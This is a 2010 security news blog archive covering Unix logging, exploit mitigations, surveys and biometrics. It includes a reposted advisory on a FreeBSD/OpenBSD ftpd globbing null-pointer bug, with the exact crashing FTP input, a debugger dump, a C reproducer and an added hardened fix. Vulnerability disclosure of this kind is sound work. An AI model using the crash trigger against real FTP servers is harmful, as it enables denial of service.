Mar 11 2010

Unix Logging

There are a wide variety of logging functions and services on UNIX. Some of these, such as the Solaris audit facility, are limited to a particular variety of UNIX. It is important that the digital forensics analyst become familiar with the logging deployed on the UNIX system they are reviewing. In particular, have a look at the syslog configuration file and the “/var/log” and “/var/run” directories, and check whether any remote log servers are in use. Syslog is a network service, although it is most commonly run locally; it can also forward logs to a remote system, so the logs you need may not all be on the host being examined.

Source


Mar 8 2010

As Memory Protections Advance, Exploits Stay a Step Ahead

Despite years of efforts by software security teams at major vendors to harden the operating systems and browsers that are the most common targets of attackers, exploitation of new as well as older vulnerabilities is still simpler than many people might think.

Microsoft, Mozilla, Adobe and even Apple, to some degree, have put in place technologies in their newer products that are designed to make it more difficult for attackers to exploit vulnerabilities, including unknown flaws. However, these technologies, which include DEP, ASLR and SafeSEH, are mitigations, not absolute defenses against exploitation, said Dino Dai Zovi, a researcher and chief scientist at Endgame Systems, in a talk at the RSA Conference here. As effective as some of these technologies can be, they’re not meant to eliminate the possibility of a system being compromised.

“Attack mitigation takes the universe of exploit techniques and narrows it down,” he said. “But preventing the introduction of malicious code isn’t enough to prevent malicious computations.”

Microsoft has been steadily adding memory-protection technologies such as ASLR and DEP to its products over the last few years, and they are now enabled by default in the latest versions of Windows and Internet Explorer. Address Space Layout Randomization (ASLR) is designed to make it more difficult for attackers to overwrite a specific portion of memory by randomizing the location of key areas in a process’s memory. With things in unpredictable locations, it’s much more difficult for attackers to get their data into the right place for an attack.

However, even with ASLR and Data Execution Prevention (DEP) enabled, it’s still possible to exploit vulnerabilities in the most recent versions of IE and Windows. In his talk, Dai Zovi showed a live demonstration in which he exploited the so-called Aurora IE vulnerability on Windows 7 running IE8. This configuration was thought to be immune to such attacks, but Dai Zovi was able to bypass the memory protections by chaining several attack techniques together. The presence of DEP and ASLR made the attack more difficult, but not impossible.

Dai Zovi said that while his attack worked in this instance, that’s no guarantee that a similar technique would work in another situation.

“Exploitation in the wild that bypasses DEP is pretty rare,” he said. DEP is specifically designed to prevent attackers from forcing an application to execute data from portions of memory that are designated as non-executable.

In fact, Microsoft has acknowledged the limitations of DEP from the beginning, and says that it is simply one of several tools that can help prevent memory corruption attacks.

“DEP presents a hurdle to attackers as they attempt to successfully exploit security vulnerabilities. In some cases, it is possible for an attacker to evade DEP by using an exploitation technique such as return-to-libc. DEP by itself is generally not a robust mitigation. DEP is a critical part of the broader set of exploit mitigation technologies that have been developed by Microsoft such as ASLR, SeHOP, SafeSEH, and /GS. These mitigation technologies complement one another; for example DEP’s weaknesses tend to be offset by ASLR and vice versa. DEP and ASLR used together are very difficult to bypass. The known bypasses that exist have been tied to specific application contexts (such as the IE7 and earlier bypass from Mark Dowd and Alex Sotirov),” Microsoft’s Robert Hensing wrote last year.

But, as Dai Zovi and others have shown, even with these technologies enabled, exploitation is still possible. Attackers have begun using third-party applications to bypass ASLR and DEP on Windows recently. A researcher named Dionysus Blazakis showed in February how he could use a technique called JIT-spraying to exploit a vulnerability in Adobe Flash and bypass both ASLR and DEP. This scenario is not something that Microsoft security engineers would have contemplated or been able to prevent on their end; it’s a result of the complex interactions among applications in production environments, not test labs.

“Systems fail more because of implementation than theory. The real world is complicated,” Dai Zovi said.

Source


Mar 8 2010

Security pros doubt their network-based security

Brocade’s “man-on-the-street” survey at this week’s RSA conference in San Francisco revealed that 47 percent of respondents believe their network security solutions are less than 25 percent effective in thwarting security threats. Given the frequency of new attacks on networks every day, it’s clear IT security professionals aren’t feeling prepared.

Nearly 20 percent of those polled believe their company’s security policies that deal with threats or data leaks are not being enforced effectively, while 80 percent believe the policies are only being “somewhat enforced.” Therefore, regardless of how ironclad a company’s security policies are, enforcing them 100 percent of the time is impossible and can expose a company to outside threats unnecessarily.

When asked about sources of security threats and breaches, 48 percent of those polled identified individuals within their organization providing or selling sensitive information to competitive companies as their most serious security concern; this was followed by concerns about threats posed by foreign governments (15%) and hacking attacks by cyber criminals (10%). Despite the constant threat of foreign entities and governments infiltrating U.S. companies that have made headlines, most security executives’ fears are overwhelmingly focused on internal competitive threats vs. a malicious foreign attack.

Another interesting finding revealed that nearly 40 percent of those surveyed felt background checks on employees were ineffective in determining if that person could be a potential spy for a competitor or foreign government.

The survey polled 144 conference attendees who are involved in the IT security decision-making process within a wide variety of industries, including networking manufacturing, education, software, healthcare, telecommunications, government and finance.

Source


Mar 8 2010

FreeBSD and OpenBSD ftpd bug (not exploitable?)

FreeBSD ftpd globbing bug – null pointer dereference ?

Affected FreeBSD Releases
+-+-+-+-+-+-+-+-+-+
FreeBSD 8.0, 6.3 and 4.9

Affected OpenBSD Releases
+-+-+-+-+-+-+-+-+-+
OpenBSD 4.6

Testing Environment
+-+-+-+-+-+-+-+-+-+
FreeBSD localhost.Belkin 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21
15:48:17 UTC 2009
root () almeida cse buffalo edu:/usr/obj/usr/src/sys/GENERIC i386

Full Description
+-+-+-+-+-+-+-+-+-+
FreeBSD (tested back to 4.9-Release) (and OpenBSD 4.6) has a bug in its ftpd when handling globbing requests.

My investigation results in this being a null pointer dereference in popen.c. I am not sure if this could be a heap overrun, but I don’t think so.

from popen.c:

        /* glob each piece */
        gargv[0] = argv[0];
        for (gargc = argc = 1; argv[argc] && gargc < (MAXGLOBARGS-1); argc++) {
                glob_t gl;
                int flags = GLOB_BRACE|GLOB_NOCHECK|GLOB_TILDE;

                memset(&gl, 0, sizeof(gl));
                gl.gl_matchc = MAXGLOBARGS;
                flags |= GLOB_LIMIT;
[1]             if (glob(argv[argc], flags, NULL, &gl))
                        gargv[gargc++] = strdup(argv[argc]);
[2]             else
[3]                     for (pop = gl.gl_pathv; *pop && gargc < (MAXGLOBARGS-1);
                            pop++)
                                gargv[gargc++] = strdup(*pop);
                globfree(&gl);
        }

At [1] glob() is called. If there's a long directory (for example "A" x 200) and a request like the one described in "How to repeat the problem" is sent to the ftpd, it crashes. My assumption is that it lands in the else clause [2]: glob doesn't fail but gives back a zeroed-out gl structure. In [3] there's then no check whether pop is NULL, and therefore *pop dereferences a null pointer and the ftpd instance crashes.

Could someone please shed some light on why glob doesn't fail but gives a zeroed-out structure back?

How to repeat the problem
+-+-+-+-+-+-+-+-+-+-+-+-+-+

$ ftp 192.168.2.11
Connected to 192.168.2.11.
220 localhost.Belkin FTP server (Version 6.00LS) ready.
Name (192.168.2.11:nr): kcope
331 Password required for kcope.
Password:
230 User kcope logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> mkdir
WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW
257
“WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW”
directory created.
ftp> ls {W*/../W*/../W*/../W*/../W*/../W*/../W*/}
200 PORT command successful.
---snip---

on the other side:

---snip---
0x282261e5 in read () at read.S:3
3       RSYSCALL(read)
Current language: auto; currently asm
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x0805622c in getline ()
(gdb) i r
eax            0x0      0
ecx            0x0      0
edx            0x0      0
ebx            0xbfbfd911       -1077946095
esp            0xbfbfba70       0xbfbfba70
ebp            0xbfbfcc08       0xbfbfcc08
esi            0x1      1
edi            0xbfbfcbf4       -1077949452
eip            0x805622c        0x805622c
eflags         0x10293  66195
cs             0x33     51
ss             0x3b     59
ds             0x3b     59
es             0x3b     59
fs             0x3b     59
gs             0x1b     27
(gdb) x/10i $eip
0x805622c:      mov    (%edx),%eax
0x805622e:      setle  %cl
0x8056231:      mov    %ecx,%esi
0x8056233:      test   %eax,%eax
0x8056235:      je     0x8056281
0x8056237:      test   %cl,%cl
0x8056239:      je     0x8056281
0x805623b:      mov    %edx,%ebx
0x805623d:      mov    0xffffee7c(%ebp),%edx
0x8056243:      lea    0xffffee90(%ebp,%edx,4),%edi
(gdb) i f
Stack level 0, frame at 0xbfbfcc10:
 eip = 0x805622c in getline; saved eip 0x805047b
 called by frame at 0xbfbfcc14
 Arglist at 0xbfbfcc08, args:
 Locals at 0xbfbfcc08, Previous frame's sp is 0xbfbfcc10
 Saved registers:
  ebx at 0xbfbfcbfc, ebp at 0xbfbfcc08, esi at 0xbfbfcc00, edi at 0xbfbfcc04,
  eip at 0xbfbfcc0c
(gdb)

Testing program:

---snip---

#include <stdio.h>
#include <string.h>
#include <glob.h>

#define MAXUSRARGS 100
#define MAXGLOBARGS 1000

/* Same flags and same result-walking loop as the ftpd code in popen.c. */
void do_glob(void) {
        glob_t gl;
        char **pop;

        char buffer[256];
        strcpy(buffer, "{A*/../A*/../A*/../A*/../A*/../A*/../A*}");

        int flags = GLOB_BRACE|GLOB_NOCHECK|GLOB_TILDE;
        memset(&gl, 0, sizeof(gl));
        gl.gl_matchc = MAXGLOBARGS;
        flags |= GLOB_LIMIT;
        if (glob(buffer, flags, NULL, &gl)) {
                printf("GLOB FAILED!\n");
                return;
        }
        else
                /* guarded variant (left commented out): also checks that pop itself is non-NULL */
                // for (pop = gl.gl_pathv; pop && *pop && 1 < (MAXGLOBARGS-1);
                /* as in ftpd: *pop is read without checking that gl_pathv is non-NULL */
                for (pop = gl.gl_pathv; *pop && 1 < (MAXGLOBARGS-1);
                    pop++) {
                        printf("glob success");
                        return;
                }
        globfree(&gl);
}

int main(int argc, char **argv) {
        do_glob();
        do_glob();
        return 0;
}
---snip---

05 March 2010
/kingcope

Source
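A hardened version of the argument-globbing loop from the advisory above, added here as an example; it is not code from the advisory or from FreeBSD's ftpd. It keeps ftpd's flags and its "keep the literal when glob() fails" behaviour, but refuses to walk a NULL gl_pathv and bounds the walk by gl_pathc, which is the check the crash above lacks. The function names, MAXGLOBARGS and the scratch-directory demo are assumptions; GLOB_LIMIT exists only on BSD-family libcs, so it is applied conditionally.

```c
#define _GNU_SOURCE                      /* glibc: expose GLOB_BRACE/GLOB_TILDE */
#include <glob.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define MAXGLOBARGS 1000
/* GLOB_BRACE/GLOB_TILDE are BSD/GNU extensions, GLOB_LIMIT is BSD-only. */
#ifndef GLOB_BRACE
#define GLOB_BRACE 0                     /* no brace expansion on this libc */
#endif
#ifndef GLOB_TILDE
#define GLOB_TILDE 0
#endif
/* Append gl's matches to the NULL-terminated gargv[]. Unlike the ftpd loop
 * quoted above, it refuses a NULL gl_pathv and walks gl_pathc entries instead
 * of trusting a NULL terminator. Returns the number of entries appended. */
static size_t append_glob_matches(const glob_t *gl, char **gargv, size_t *gargc)
{
    size_t n = 0;
    if (gl->gl_pathv == NULL || gl->gl_pathc == 0)  /* zeroed or empty result */
        return 0;
    for (size_t i = 0; i < gl->gl_pathc && *gargc < MAXGLOBARGS - 1; i++) {
        char *copy = gl->gl_pathv[i] ? strdup(gl->gl_pathv[i]) : NULL;
        if (copy == NULL)                           /* short vector or OOM */
            break;
        gargv[(*gargc)++] = copy;
        n++;
    }
    gargv[*gargc] = NULL;
    return n;
}

/* Expand one client-supplied argument the way ftpd does (the literal text is
 * kept when glob() fails), but validate the result vector before using it. */
static size_t expand_arg(const char *arg, char **gargv, size_t *gargc)
{
    glob_t gl;
    int flags = GLOB_BRACE | GLOB_NOCHECK | GLOB_TILDE;
    size_t n;
    memset(&gl, 0, sizeof(gl));
#ifdef GLOB_LIMIT                                   /* BSD: cap the match count */
    gl.gl_matchc = MAXGLOBARGS;
    flags |= GLOB_LIMIT;
#endif
    if (glob(arg, flags, NULL, &gl) != 0) {         /* failed: keep the literal */
        char *literal[] = { (char *)arg, NULL };
        glob_t one = { .gl_pathc = 1, .gl_pathv = literal };
        n = append_glob_matches(&one, gargv, gargc);
    } else
        n = append_glob_matches(&gl, gargv, gargc);
    globfree(&gl);                                  /* safe after a failure too */
    return n;
}

/* Demo: scratch directory with files a1, a2, b1; expand "<dir>/<suffix>" and
 * return the number of arguments produced. The directory is removed again. */
int demo_expand_in_tempdir(const char *suffix)
{
    static const char *names[] = { "a1", "a2", "b1" };
    char dir[] = "/tmp/globdemoXXXXXX", path[128], *gargv[MAXGLOBARGS] = { NULL };
    size_t gargc = 0, n;
    if (mkdtemp(dir) == NULL)
        return -1;
    for (int i = 0; i < 3; i++) {
        FILE *f;
        snprintf(path, sizeof(path), "%s/%s", dir, names[i]);
        if ((f = fopen(path, "w")) != NULL)
            fclose(f);
    }
    snprintf(path, sizeof(path), "%s/%s", dir, suffix);
    n = expand_arg(path, gargv, &gargc);
    for (size_t i = 0; i < n; i++) {
        printf("arg[%zu] = %s\n", i, gargv[i]);
        free(gargv[i]);
    }
    for (int i = 0; i < 3; i++) {                   /* clean up the scratch dir */
        snprintf(path, sizeof(path), "%s/%s", dir, names[i]);
        unlink(path);
    }
    rmdir(dir);
    return (int)n;
}
```

Feeding append_glob_matches a zeroed glob_t, the situation the advisory describes, returns 0 instead of faulting on *pop.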


Feb 26 2010

Pros and cons of biometric authentication

In theory, biometrics are a great way to authenticate a user: it’s impossible to lose your fingerprint (barring the most gruesome of developments), you can’t forget it like you could a password, and it’s unique to you.

In practice, though, there are so many things that, for now, limit a more widespread use of this technology.

One of the problems has been pointed out by Guy Churchward, CEO of LogLogic. He says that it is precisely this uniqueness that makes biometric data an inherently flawed choice for a primary method of authentication.

“Once you have your fingerprint scanned it will give a unique data sequence which if compromised is not exactly something you can change,” he says. “Imagine having an option of only one password ‘ever’. One loss and you are screwed.”

Another problem is that current scanners still can’t tell whether a fingerprint is on a real finger or an artificial one. Andrew Clarke, of e-DMZ Security, says that in theory one could obtain a user’s fingerprint using the techniques used in crime detection and transfer it onto an artificial finger. This will likely change as the technology evolves, but for now the system is still fallible and not suitable as a primary solution to the authentication problem.

“As with all authentication, multiple factors increase the effectiveness of the solution. Something you have (fingerprint) combined with something you know (passcode) provides a stronger solution,” he says.

According to SC Magazine, David Ting, CTO of Imprivata, sees the good side of this kind of authentication. He says that the contents of any computer should be encrypted, and that access to them should be secured by a password AND by biometrics. According to him, a biometric password is infinitely more difficult to recover with a brute-force attack than a “normal” password.

He favors using complex passwords initially to thwart cracking, and, for securing the Windows logon, using biometrics, one-time password tokens or smartcards for the reason given above.

Source


Feb 25 2010

FBI outlines three components of cyber-risk

To make better cybersecurity-related decisions a senior FBI official recommends considering a simple algebraic equation—risk = threat x vulnerability x consequence—rather than solely focusing on threat vectors and actors.

Each factor is important, Steven Chabinsky, deputy assistant director at the FBI’s Cyber Division, said today. Chabinsky spoke on a panel at the Armed Forces Communications and Electronics Association Homeland Security Conference in Washington.

Nation-states that commit espionage, terrorist organizations, individuals interested in using the Internet as an attack tool and criminal syndicates are the types of attackers most likely to target computer systems in both the public and private sectors, he said. Threat vectors on which the FBI is focused include remote access and intrusion, supply chain vulnerabilities, proximate or close-access threats, and insider access threats, he said.

Chabinsky said the risk model is compelling because risk drops to zero if any of those three elements or variables is zero. He said the risk model is the first place he goes when he needs to step back strategically.

“Unfortunately, we haven’t gotten to the point where I feel we can maintain at zero any one of those elements, so we have to constantly figure out as an organization how we are driving down each of those,” he said.

He added, “If you look through the risk model you’ll find that you have opportunities on the threat vulnerability and consequence management side, and you have to find your partners so that you could work together.”

Source


Feb 25 2010

U.S. Schools Fall Short On Cybersecurity Education

Young U.S. Internet users are not receiving enough education about being safe online, according to a new poll by the National Cyber Security Alliance (NCSA) and supported by Microsoft.

More than three quarters of teachers have spent fewer than six hours on education related to cyberethics, cybersafety, and cybersecurity in the last 12 months; more than 50% of teachers reported their school districts do not require these subjects as curriculum; and only 35% taught proper online conduct.

Key highlights of the survey include:

* More than 90% of technology coordinators, school administrators and teachers support teaching cyberethics, cybersafety and cybersecurity in schools. However, only 35% of teachers and just over half of school administrators report that their school districts require cyberethics, cybersafety, and cybersecurity in their curriculum.

* Low levels of integration of key cyberethics, cybersecurity, and cybersafety topics into everyday instructional activities. For example, only 27% of teachers taught about the safe use of social networks, only 18% taught about scams, fraud and social engineering, and only 19% taught about safe passwords in the past 12 months. Additionally, 32% of teachers indicated they had not taught cyberethics, and 44% of teachers had not taught cybersafety or cybersecurity.

* Differing opinions between teachers and administrators as to who is or should be responsible (parents vs. teachers) for educating students about cyberethics, cybersafety, and cybersecurity. For example, while 72% of teachers indicated that parents bear the primary responsibility for teaching these topics, 51% of school administrators indicate that teachers are responsible.

“The study illuminates that there is no cohesive effort to provide young people the education they need to safely and securely navigate the digital age and prepare them as digital citizens and employees,” said Michael Kaiser, Executive Director of the National Cyber Security Alliance. “Unfortunately, we are not meeting the needs of schools, teachers, or students.”

The survey also found schools rely on shielding students instead of teaching behaviors for safe and secure Internet use. More than 90 percent of schools have built up digital defenses, such as filtering and blocking social networking sites, to protect children on school networks. While those measures may help reduce the online risks children face at school, they do not prepare students to act more safely when accessing the Internet at home or on mobile devices.

Source


Feb 25 2010

Cryptome.org shut down for exposing MS surveillance guide

Cryptome, the whistleblower site that serves as a repository for “documents for publication that are prohibited by governments worldwide, in particular material on freedom of expression, privacy, cryptology, dual-use technologies, national security, intelligence, and secret governance”, has been taken down on Wednesday afternoon by its hosting provider, Network Solutions, which also had the domain “legally locked”.

This means that the domain information can’t be modified and the domain name can’t be transferred; only the registration can be renewed. The action by Network Solutions was prompted by a Digital Millennium Copyright Act (DMCA) complaint filed by Microsoft against Cryptome and its owners over the publication of Microsoft’s Global Criminal Compliance Handbook, a document that reveals to users things that Microsoft would not like to become common knowledge.

In it you can find information about what records are retained and for how long, and what information can and will be given to law enforcement and intelligence agencies if requested by subpoena. Microsoft is not the only company whose “spy guide” has been published by Cryptome, but it’s apparently the one with the most clout.

ReadWriteWeb reports that once the complaint was filed and Paul Young, one of the owners of Cryptome, was asked to take the document off the website, he refused. The ISP then intervened with a warning that if the document wasn’t removed by Thursday, they would disable the site. And so they did – one day before the imposed deadline.

In the complaint, Microsoft states as the reason for their request an infringement of copyright laws. The Electronic Frontier Foundation (EFF), the well-known international digital rights watchdog group, spoke up: “We find it troubling that copyright law is being invoked here. Microsoft doesn’t sell this manual. There’s no market for this work. It’s not a copyright issue. John’s copying of it is fair use. We don’t do this anywhere else in speech law.”

Cryptome has been active since 1996, and this is the first time that someone has succeeded in their mission to shut it down. Young has filed a counter-notification, and we probably won’t have to wait long for the next installment of this story. If Microsoft doesn’t forward a notice of litigation, Network Solutions will reactivate the Website and unlock the domain in no more than 14 business days. In the meantime, the website is temporarily available here.

If you want to read Microsoft’s “spy guide”, you can download it at Wikileaks, which has also offered to host Cryptome on its multi-jurisdictional network outside the US.

Source


Feb 19 2010

10 strategic security initiatives for every organization

Where computer security is involved, it’s always good to understand the kinds of breaches that companies have suffered and what the actual or suspected vulnerabilities were that allowed the breaches to occur. It is in this spirit that the members of SpiderLabs, the advanced security team within Trustwave, have published their Global Security Report of 2010. The report is based on more than 200 forensic studies and almost 1,900 penetration tests conducted by SpiderLabs in 2009.

For the most part, SpiderLabs’ report is fairly consistent with security breach reports published by other security consultants and investigative agencies. By this I mean that thieves tend to target high-value information such as credit card data, Social Security numbers and other information that can easily be sold in the underground economy. In SpiderLabs’ investigations, point-of-sale software systems were the most frequently breached systems.

Another consistency with other security reports is the fact that many breaches can be traced to known vulnerabilities that had been left unpatched. This further emphasizes the importance of a consistent patch strategy within your organization.

I recently talked with Nicholas Percoco, senior vice president of SpiderLabs, to get his recommendations of strategic initiatives for every organization. If you follow Percoco’s top 10 recommendations, you should vastly reduce your company’s risk of a security breach.

1. Perform and maintain a complete asset inventory, and decommission old systems. Knowing precisely what you have is the first step to securing it. Percoco says his team’s investigations frequently find devices that the customer organization doesn’t even know about. In addition, the investigations often turn up old systems that have a planned decommission date. The customers often aren’t concerned about keeping such systems up to date with patches because they are due to be taken off-line soon. Percoco says that in 75% of the cases, those systems slated for decommissioning are still in use a year later – unpatched and more vulnerable than ever.

2. Monitor your third-party relationships. In 81% of the cases the SpiderLabs team investigated, third-party vendors and their products were responsible for introducing vulnerabilities, mostly stemming from insecure remote access implementations and default, vendor-supplied credentials. Percoco advises that you discuss your security policies with your vendors and ensure they adhere to them.

3. Segment your network into as many zones as feasibly possible. If you’ve got a completely flat network, and one device on that network can see or talk to any other device, you’ve got a problem. A hacker gaining entry to this network has easy access to everything. Percoco tells a story about using a network connection in a hotel conference room. From there he was able to see the hotel’s reservations system. Uh oh.

4. Rethink your wireless implementation. Wireless security is a fast-moving target that companies often struggle to keep up with. Percoco recommends you never place wireless access points within your corporate core network; rather, place them outside your network and treat them like any other remote access medium. Your perimeter security should help keep unwanted visitors out.

5. Encrypt your sensitive data. In their investigations, the SpiderLabs team has found clear-text sensitive data quite easily. Best practices dictate that you should understand where data is located, purge what isn’t needed and encrypt the rest, including data in transit.

6. Investigate anomalies — they could be warning signs. Excessive login attempts, server crashes, “noise” from a device: All of these could be signs that someone is doing something unusual and unwanted on your network. At the very least, investigate the anomaly with a suspicious eye as soon as you detect it. Doing so might prevent or limit the damage from a breach.

7. Lock down user access. Most employees do not need the high level of access that they are given. Having too many privileges allows them to do harmful things, either inadvertently or intentionally. Perform an analysis of role and access privileges and lock down as much as you can.

8. Use multifactor authentication everywhere possible. Percoco says we’re too dependent on simply using passwords for authentication. This isn’t good enough anymore. He recommends you deploy multifactor authentication where possible. There are lots of new techniques and technologies to choose from.

9. Implement and follow a formal Software Development Life Cycle (SDLC). SpiderLabs’ experience with penetration testing has shown that many organizations don’t provide enough checks and balances in their software development process. A comprehensive SDLC process is vitally important in the development of secure applications.

10. Don’t forget to educate everyone. IT security is everyone’s responsibility. Percoco says organizations need to implement a mandatory security awareness training program that every employee must attend annually.

Source


Feb 17 2010

2010 CWE/SANS Top 25 Most Dangerous Programming Errors

The 2010 CWE/SANS Top 25 Most Dangerous Programming Errors is a list of the most widespread and critical programming errors that can lead to serious software vulnerabilities. They are often easy to find, and easy to exploit. They are dangerous because they will frequently allow attackers to completely take over the software, steal data, or prevent the software from working at all.

The Top 25 list is a tool for education and awareness to help programmers to prevent the kinds of vulnerabilities that plague the software industry, by identifying and avoiding all-too-common mistakes that occur before software is even shipped. Software customers can use the same list to help them to ask for more secure software. Researchers in software security can use the Top 25 to focus on a narrow but important subset of all known security weaknesses. Finally, software managers and CIOs can use the Top 25 list as a measuring stick of progress in their efforts to secure their software.

The list is the result of collaboration between the SANS Institute, MITRE, and many top software security experts in the US and Europe. It leverages experiences in the development of the SANS Top 20 attack vectors (http://www.sans.org/top20/) and MITRE’s Common Weakness Enumeration (CWE) (http://cwe.mitre.org/). MITRE maintains the CWE web site, with the support of the US Department of Homeland Security’s National Cyber Security Division, presenting detailed descriptions of the top 25 programming errors along with authoritative guidance for mitigating and avoiding them. The CWE site contains data on more than 800 programming errors, design errors, and architecture errors that can lead to exploitable vulnerabilities.

The 2010 Top 25 makes substantial improvements to the 2009 list, but the spirit and goals remain the same. The structure of the list has been modified to distinguish mitigations and general secure programming principles from more concrete weaknesses. This year’s Top 25 entries are prioritized using inputs from over 20 different organizations, who evaluated each weakness based on prevalence and importance. The new version introduces focus profiles that allow developers and other users to select the parts of the Top 25 that are most relevant to their concerns. The new list also adds a small set of the most effective “Monster Mitigations,” which help developers to reduce or eliminate entire groups of the Top 25 weaknesses, as well as many of the other 800 weaknesses that are documented by CWE. Finally, many high-level weaknesses from the 2009 list have been replaced with lower-level variants that are more actionable.

Source